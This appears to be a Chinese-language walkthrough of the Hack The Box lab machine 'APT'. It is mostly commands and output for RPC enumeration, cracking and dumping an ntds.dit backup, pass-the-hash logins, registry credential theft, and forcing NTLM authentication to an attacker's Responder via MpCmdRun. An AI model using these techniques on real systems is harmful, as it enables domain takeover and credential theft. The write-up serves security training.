APT

APT

 
Recon
IP address :10.10.10.213
PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Gigantic Hosting | Home |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016 (88%) OS CPE: cpe:/o:microsoft:windows_server_2016 Aggressive OS guesses: Microsoft Windows Server 2016 (88%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
PORT STATE SERVICE 80/tcp open http |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. 135/tcp open msrpc
 
 
看一下80
notion image
扫一下目录
sudo gobuster dir -u http://10.10.10.213 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
notion image
没有看到有用目录
 
notion image
HTTrack Website Copier google 一下
notion image
利用不了
notion image
notion image
看看图片有无隐写
notion image
notion image
没有
 
切回来看看其他端口
 
googling for 135 MSRPC
notion image
export PATH=/usr/share/doc/python3-impacket/examples:$PATH rpcdump.py 10.10.10.213 -port 135
rpcdump
rpcmap.py ncacn_ip_tcp:10.10.10.213[135]
rpcmap
 
爆破一下uuids,opnums
rpcmap.py ncacn_ip_tcp:10.10.10.213[135] -brute-uuids -brute-opnums
 
notion image
99FCFEC4-5260-101B-BBCB-00AA0021347A
googling…
notion image
IObjectExporter?
看一下成功的opnum(3&5)
notion image
都是serverAlive的method
googling…
搜一下 OXID resolver
下载过来
wget https://raw.githubusercontent.com/mubix/IOXIDResolver/master/IOXIDResolver.py
./IOXIDResolver.py -t 10.10.10.213
notion image
取出了IPv6的地址
dead:beef::b885:d62a:d679:573f
检查一下是否有效
sudo nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f
notion image
53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837
88 kerberos
5985 windows remote management
47001 winrm域控部署了
最下面这些端口都是动态端口,可能是临时起的服务
 
开始做服务枚举
sudo nmap -sT -sC -O -sV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837 -6 dead:beef::b885:d62a:d679:573f -oA nmap/v6service
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-server-header: | Microsoft-HTTPAPI/2.0 |_ Microsoft-IIS/10.0 |_http-title: Bad Request 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-29 15:01:52Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Bad Request |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49695/tcp open msrpc Microsoft Windows RPC 53837/tcp open msrpc Microsoft Windows RPC No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94%E=6%D=10/29%OT=53%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=653E7428%P= OS:x86_64-pc-linux-gnu)S1(P=6000{4}28067fXX{32}0035c8a84de4f61758431873a01 OS:22000b389000002040526010303080402080a001def8cff{4}%ST=0.241679%RT=0.276 OS:587)S2(P=6000{4}28067fXX{32}0035c8a917972cc858431874a0122000b2c10000020 OS:40526010303080402080a001defefff{4}%ST=0.340627%RT=0.375607)S3(P=6000{4} OS:28067fXX{32}0035c8aa85595bf158431875a0122000187000000204052601030308010 OS:1080a001df054ff{4}%ST=0.441347%RT=0.479882)S4(P=6000{4}28067fXX{32}0035 OS:c8ab7344ceb958431876a0122000b444000002040526010303080402080a001df0c9ff{ OS:4}%ST=0.541405%RT=0.595134)S5(P=6000{4}28067fXX{32}0035c8ac868640755843 OS:1877a01220002ef3000002040526010303080402080a001df11bff{4}%ST=0.640609%R OS:T=0.675501)S6(P=6000{4}24067fXX{32}0035c8adba36bcb4584318789012200092ac OS:0000020405260402080a001df17fff{4}%ST=0.740609%RT=0.776433)IE1(P=6000{4} OS:803a7fXX{32}8100cabdabcd00{122}%ST=0.765916%RT=0.859558)TECN(P=602000{3 OS:}20067fXX{32}0035c8ae088813c65843187980522000f1a60000020405260103030801 OS:010402%ST=0.964534%RT=1.00174)EXTRA(FL=12345) Network Distance: 1 hop Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: apt | NetBIOS computer name: APT\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: apt.htb.local |_ System time: 2023-10-29T15:02:55+00:00 |_clock-skew: mean: 0s, deviation: 1s, median: 0s | smb2-time: | date: 2023-10-29T15:02:53 |_ start_date: 2023-10-29T14:30:27 | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.40 seconds
本地做一个域名映射htb.local → ipv6
notion image
看看smb
sudo smbclient -L //htb.local
Anonymous login successful Sharename Type Comment --------- ---- ------- backup Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share htb.local is an IPv6 address -- no workgroup available
sudo smbclient //htb.local/backup get backup.zip
notion image
来看看backup.zip
┌──(root㉿kali1)-[~/Desktop/APT] └─# unzip -l backup.zip Archive: backup.zip Length Date Time Name --------- ---------- ----- ---- 0 2020-09-23 19:40 Active Directory/ 50331648 2020-09-23 19:38 Active Directory/ntds.dit 16384 2020-09-23 19:38 Active Directory/ntds.jfm 0 2020-09-23 19:40 registry/ 262144 2020-09-23 19:22 registry/SECURITY 12582912 2020-09-23 19:22 registry/SYSTEM --------- ------- 63193088 6 files
ntds 是域控的SAM
ntds.jfm的作用是防止ntds.dit 写入丢失
0 2020-09-23 19:40 registry/ 262144 2020-09-23 19:22 registry/SECURITY 12582912 2020-09-23 19:22 registry/SYSTEM
这三个文件很重要,但不知道相比最新版本有没有不同
 
sudo unzip backup.zip
需要密码,试着破解
sudo zip2john backup.zip > hash4backup
johnjohn --wordlist=/usr/share/wordlists/rockyou.txt hash4backup
notion image
iloveyousomuch (backup.zip)
sudo unzip backup.zip
接下来将密钥进行转储和读取,可进行在线转储 secretsdump.py
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM LOCAL > ../user_hash_raw
notion image
转储出8000行数据
 
notion image
notion image
evil-winrm -i htb.local -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe’
失败, 提取一下所有带‘:::’的用户名和密码。username, hashlist
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $1}' >> username
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $3,$4}' | sed 's/ /:/g' >> hashlist
枚举有效用户(pre-authentication)
kerbrute userenum -d htb.local --dc htb.local username
2023/11/05 13:40:19 > [+] VALID USERNAME: Administrator@htb.local 2023/11/05 13:40:19 > [+] VALID USERNAME: APT$@htb.local 2023/11/05 13:44:14 > [+] VALID USERNAME: henry.vinson@htb.local
提取到user_3
notion image
crackmapexec smb htb.local -u user_3 -H backup/hashlist
不行
 
get_TGT.sh
#!/bin/bash while IFS='' read -r LINE || [ -n "${LINE}"] do echo "------------------" echo "Feed the Hash:${LINE}" /usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes ${LINE} done < hashlist
写一个脚本来取得票据
watch "ls -ltr | tail -2"
监控目录
 
henry.vinson@htb.local.ccache aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
找到了一个有效票据,试试
notion image
aad3b435b51404eeaad3b435b51404ee 为空密码,我取后一段e53d87d42adaa3ca32bdb34a876cbffb
 
evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb'
失败
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] Requesting shares on htb.local..... [-] share 'backup' is not writable. [-] share 'NETLOGON' is not writable. [-] share 'SYSVOL' is not writable.
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] SMBv3.0 dialect used [-] rpc_s_access_denied
dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
试一下注册表
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
notion image
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
notion image
这是之前在80端口web端看到的名字 GiganticHostingManagementSystem
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
notion image
直接爆出来用户名密码henry.vinson_adm:G1#Ny5@2dvht
用evil-winrm进行横向移动
evil-winrm -i htb.local -u henry.vinson_adm -p 'G1#Ny5@2dvht'
成功登录
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
notion image
notion image
notion image
type C:/users/henry.vinson_adm/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
$Cred = get-credential administrator invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
GPT:
LmCompatibilityLevel 定义了客户端和服务器之间在建立会话时使用的身份验证模式或网络安全协议。具体来说,LmCompatibilityLevel 的值为2意味着:
  • 客户端不会发送LM响应给服务器。
  • 服务器会接受LM、NTLM和NTLMv2认证。
  • 服务器会尝试使用NTLMv2会话安全,如果失败则退回到NTLM。
 
Googling…
notion image
 
Responder
lgandxUpdated May 2, 2024
mpCmdRun.exe 用来下载文件
notion image
 
git clone https://github.com/lgandx/Responder.git
sudo ./Responder.py -I tun0 --lm -v
设置一个16位chall set
 
 
Windows这边Windows Defender目录下载
.\MpCmdrun.exe -Scan -scantype 3 -File \\10.10.16.2\nodexist
notion image
 
 
./ntlmv1.py --ntlmv1 APT$::HTB:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:1234567887654321
Hashfield Split: ['APT$', '', 'HTB', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '1234567887654321'] Hostname: HTB Username: APT$ Challenge: 1234567887654321 LM Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07 NT Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07 CT1: 6357C2E21068CA76 CT2: DAEE4B944CFF3622 CT3: 034580F3BFECBF07 To Calculate final 4 characters of NTLM hash use: ./ct3_to_ntlm.bin 034580F3BFECBF07 1234567887654321 To crack with hashcat create a file with the following contents: 6357C2E21068CA76:1234567887654321 DAEE4B944CFF3622:1234567887654321 echo "6357C2E21068CA76:1234567887654321">>14000.hash echo "DAEE4B944CFF3622:1234567887654321">>14000.hash To crack with hashcat: ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1 To Crack with crack.sh use the following token $NETLM$1234567887654321$6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
notion image
sudo ./Responder.py -I tun0 --lm -v
notion image
./ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Hashfield Split: ['APT$', '', 'HTB', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '1122334455667788'] Hostname: HTB Username: APT$ Challenge: 1122334455667788 LM Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384 NT Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384 CT1: 95ACA8C7248774CB CT2: 427E1AE5B8D5CE68 CT3: 30A49B5BB858D384 To Calculate final 4 characters of NTLM hash use: ./ct3_to_ntlm.bin 30A49B5BB858D384 1122334455667788 To crack with hashcat create a file with the following contents: 95ACA8C7248774CB:1122334455667788 427E1AE5B8D5CE68:1122334455667788 echo "95ACA8C7248774CB:1122334455667788">>14000.hash echo "427E1AE5B8D5CE68:1122334455667788">>14000.hash To crack with hashcat: ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1 To Crack with crack.sh use the following token NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384